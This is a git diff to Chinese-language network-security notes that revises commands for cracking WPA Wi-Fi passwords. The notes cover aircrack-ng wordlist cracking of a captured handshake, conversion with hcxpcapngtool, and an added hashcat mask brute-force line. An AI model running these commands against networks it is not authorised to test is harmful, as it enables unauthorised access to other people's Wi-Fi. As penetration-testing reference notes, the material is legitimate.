--- a/网络安全.md
+++ b/网络安全.md
@@ -115,7 +115,9 @@ aircrack-ng -b *:*:*:*:*:* -w password.txt *.cap
 # 把cap转成hashcat文件 https://hashcat.net/cap2hashcat
 hcxpcapngtool handshake-01.cap -o handshake-01.hc22000
 # 用hashcat破解密码  参数: -m 22000 模式 = WPA-PBKDF2-PMKID+EAPOL
-hashcat --show --status -a 3 -m 22000 handshake-01.hc22000 password.txt
+hashcat --show --status -m 22000 handshake-01.hc22000 password.txt
+   # 参数: -a 3 “小写字母加数字” --increment- “密码长度限制”  ?* “掩码破解方式” ?|小写 ?u大写 ?d数字 ?s特殊 ?a全部
+hashcat -a 3 -m 22000 --increment --increment-min 8 --increment-max 8 hs-01.hc22000 ?h?h?h?h?h?h?h?h
 
 # 停止无线网卡监听模式
 airmon-ng stop wlan0mon
